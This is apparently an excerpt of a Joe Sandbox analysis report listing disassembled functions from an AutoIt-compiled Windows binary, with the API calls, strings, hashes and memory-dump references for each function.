Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
Instruction ID: 179cca3ad32586910f3e31681ef658fffb1b97ab2fa80efbed0c9ae0cfa489ba
Opcode Fuzzy Hash: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
Instruction Fuzzy Hash: BC617C312082429FD714DF18C4D9F25BBA1FF44319F18858CE8668B7A2C7B6EC49CB92

Function 00863886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00863925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0086393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00863954
_wcslen.LIBCMT ref: 00863999
SendMessageW.USER32(?,00001057,00000000,?), ref: 008639C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 008639F4

Strings

SysListView32, xrefs: 008638F7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
Instruction ID: 337910a69c09f2191850d604dfe03dac6532d8c8b3d26fb7a59ddf7128e131c8
Opcode Fuzzy Hash: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
Instruction Fuzzy Hash: BC41A571A00219ABEF219F64CC49FEA7BA9FF08354F11052AF959E7281D7B59D80CB90

Function 0083BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0083BCFD
IsMenu.USER32(00000000), ref: 0083BD1D
CreatePopupMenu.USER32 ref: 0083BD53
GetMenuItemCount.USER32(016D5298), ref: 0083BDA4
InsertMenuItemW.USER32(016D5298,?,00000001,00000030), ref: 0083BDCC

Strings

0, xrefs: 0083BCA8
2, xrefs: 0083BD37

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
Instruction ID: 66ee049a7c0a492ec0f99d3cdf12c4639334d7507380c36f3b2a949ca940f673
Opcode Fuzzy Hash: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
Instruction Fuzzy Hash: D451AFB0A042099BDF20DFA8D888BAEBBF4FF85354F144159E651E7291D7709D41CBA2

Function 0083C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0083C913

Strings

stop, xrefs: 0083C8E4
blank, xrefs: 0083C895
info, xrefs: 0083C8B4
question, xrefs: 0083C8CC
warning, xrefs: 0083C8FC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
Instruction ID: bab7d15ca90692d81cc114e08681ce32b5298a3fc636daae829ebf2897bb04ce
Opcode Fuzzy Hash: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
Instruction Fuzzy Hash: E711EE3268930ABAEB016B549C82DBB7B9CFF55354F11406AF900F5381E7A46F0053A4

Function 0083ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0083ED2A
_wcslen.LIBCMT ref: 0083ED3B
_wcslen.LIBCMT ref: 0083ED79
_wcslen.LIBCMT ref: 0083EDAF
_wcslen.LIBCMT ref: 0083EDDF
_wcslen.LIBCMT ref: 0083EDEF
_wcslen.LIBCMT ref: 0083EE2B
_wcslen.LIBCMT ref: 0083EE5A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
Instruction ID: 9005b4fee67a1573adadde7ea8da5e073b54b8f6bed06060ebee01e094dfbc77
Opcode Fuzzy Hash: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
Instruction Fuzzy Hash: 4441AF66D1021CB6CB11EBF4888A9DFB3A8FF45700F408466E614E3261EB38E245C3E6

Function 007EF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 007EF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F454

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
Instruction ID: d1eba26eeb5312bf5f89ef1a611ae41b32a76ec02e6ec90a9d37ff01e858f902
Opcode Fuzzy Hash: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
Instruction Fuzzy Hash: 9941E6316096C0BAD7359B2A988CB2A7AA1BB5E314F15443DE1C7D6E63C679B8C0CB11

Function 00862D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00862D1B
GetDC.USER32(00000000), ref: 00862D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00862D2E
ReleaseDC.USER32(00000000,00000000), ref: 00862D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00862D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00862D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00865A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00862DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00862DE1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
Instruction ID: fde8fb903ffbc60a23ac92f5e6cde3b8c0f396abf1542907a8265363824b14a2
Opcode Fuzzy Hash: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
Instruction Fuzzy Hash: 47318772201614BBEB218F54DC8AFFB3BA9FB09715F0550A5FE48DA291C6B59C40CBA4

Function 00835622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00835637
_memcmp.LIBVCRUNTIME ref: 00835659
_memcmp.LIBVCRUNTIME ref: 00835671
_memcmp.LIBVCRUNTIME ref: 00835684
_memcmp.LIBVCRUNTIME ref: 0083569E
_memcmp.LIBVCRUNTIME ref: 008356B1
_memcmp.LIBVCRUNTIME ref: 008356C9
_memcmp.LIBVCRUNTIME ref: 008356E4

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
Instruction ID: 45820001bf4c1f75dcc1ad0f6418d34b1c979b0d8077dce72757c3e108fc792f
Opcode Fuzzy Hash: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
Instruction Fuzzy Hash: 2A2180A1644A1DFBD21456209E83FBA235DFFB0394F850020FE05DA782F768ED10C6E5

Function 00854FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00855007
NULL Pointer assignment, xrefs: 0085502E, 00855383

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5bec701dc5ac9b730472e4736bef63309d5da448d10a36cfb3d643901aae941d
Instruction ID: 871cc27213e9bda3a34126ad7cc6038c82ad7036367c061c562b595e546b8cb7
Opcode Fuzzy Hash: 5bec701dc5ac9b730472e4736bef63309d5da448d10a36cfb3d643901aae941d
Instruction Fuzzy Hash: ECD1B171A0060A9FDF10CFA8C8A1BAEB7B5FF48355F148069E915EB281E771DD49CB90

Function 00811522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008115CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00811651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008117FB,?,008117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008116E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008116FB

Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00811777
__freea.LIBCMT ref: 008117A2
__freea.LIBCMT ref: 008117AE

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
Instruction ID: 3b7673bc27921aced05ea7ae3d99408d5174b214b3b2b2313684c4320bb6c458
Opcode Fuzzy Hash: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
Instruction Fuzzy Hash: 3A91A571E0021A9ADF208E74DC89AEE7BBEFF49714F184659EA05E7281DB35DC80C760

Function 00854523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00854648
VariantInit.OLEAUT32(?), ref: 00854749
VariantClear.OLEAUT32(?), ref: 00854753
VariantClear.OLEAUT32(?), ref: 008547B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 008545D8, 00854706, 008547BE
Incorrect Object type in FOR..IN loop, xrefs: 0085472C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 052f4d488653cd8cd235bccaeb9340fc3130b52341980063930c8d6cfb212962
Instruction ID: 6bc41bd9291d7315ee098b437fd2b518c0562d0295cc09f3a3e11fc66f18cdf5
Opcode Fuzzy Hash: 052f4d488653cd8cd235bccaeb9340fc3130b52341980063930c8d6cfb212962
Instruction Fuzzy Hash: 45919171A00219ABDF20CFA5C844FAE7BB8FF49719F109559F915EB280D7709989CFA0

Function 00841187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0084125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00841284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008412A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008412D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0084135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008413C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00841430

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: f01b5784e8aa12d478ec22b868e60fa582ce0a25e9c5adedb03f5d663c395ff0
Instruction ID: 04935c39c8a53fe5f7e026149213559388c7e8939009b4acde79d3c2467da363
Opcode Fuzzy Hash: f01b5784e8aa12d478ec22b868e60fa582ce0a25e9c5adedb03f5d663c395ff0
Instruction Fuzzy Hash: 6191D275A0021D9FDF01DFA8C888BBEB7B5FF44315F154029E940EB291DBB8A981CB95

Function 007E948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
Instruction ID: 45c45fa38699200a766a1bfabce7db86a6f10474a21a4f7df4604bef67b572de
Opcode Fuzzy Hash: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
Instruction Fuzzy Hash: C7914A72D01259EFCB10CFAACC88AEEBBB8FF49320F144455E515B7291D778A951CB60

Function 00853947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0085396B
CharUpperBuffW.USER32(?,?), ref: 00853A7A
_wcslen.LIBCMT ref: 00853A8A
VariantClear.OLEAUT32(?), ref: 00853C1F

Part of subcall function 00840CDF: VariantInit.OLEAUT32(00000000), ref: 00840D1F
Part of subcall function 00840CDF: VariantCopy.OLEAUT32(?,?), ref: 00840D28
Part of subcall function 00840CDF: VariantClear.OLEAUT32(?), ref: 00840D34

Strings

Incorrect Parameter format, xrefs: 008539A6, 00853BA1
AUTOIT.ERROR, xrefs: 00853A80, 00853A85

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: ca1b4587fb5dae45cde2c70e201c0e80b7f0eb851c27e7f460c9cc87e996e1c8
Instruction ID: a2e977c3712cda161c6f5caabc69751585f8c6c49774a3afb17bbb30ecb99c0e
Opcode Fuzzy Hash: ca1b4587fb5dae45cde2c70e201c0e80b7f0eb851c27e7f460c9cc87e996e1c8
Instruction Fuzzy Hash: 0C9135746083059FC704DF28C48496AB7E4FB88355F14892EF88ADB351DB35EE49CB92

Function 00854BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0083000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
Part of subcall function 0083000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
Part of subcall function 0083000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
Part of subcall function 0083000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00854C51
_wcslen.LIBCMT ref: 00854D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00854DCF
CoTaskMemFree.OLE32(?), ref: 00854DDA

Strings

NULL Pointer assignment, xrefs: 00854E23, 00854E52

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
Instruction ID: 0ef9af7b78b3435bdfb94f14a2d895c0998d34c4e7f55b9f0dddd075015d698d
Opcode Fuzzy Hash: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
Instruction Fuzzy Hash: EF912571D0021DEBDF14DFA4D895AEEB7B9FF08314F10416AE915A7241DB749A488FA0

Function 008620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00862183
GetMenuItemCount.USER32(00000000), ref: 008621B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008621DD
_wcslen.LIBCMT ref: 00862213
GetMenuItemID.USER32(?,?), ref: 0086224D
GetSubMenu.USER32(?,?), ref: 0086225B

Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008622E3

Part of subcall function 0083E97B: Sleep.KERNELBASE ref: 0083E9F3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 01452eb732508cf23181bfd8d7a688c4882360fd29aae8ac2d35cca781c12fb3
Instruction ID: febd086a49c9af7690c9fa6cd96e1c527384f5bab03780f6919a889bad497dbd
Opcode Fuzzy Hash: 01452eb732508cf23181bfd8d7a688c4882360fd29aae8ac2d35cca781c12fb3
Instruction Fuzzy Hash: 52719E35A00605EFCB10EF68C845AAEB7F1FF88310F158499E816EB341DB34AD418B90

Function 0083AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0083AEF9
GetKeyboardState.USER32(?), ref: 0083AF0E
SetKeyboardState.USER32(?), ref: 0083AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0083AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0083AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0083AFFD
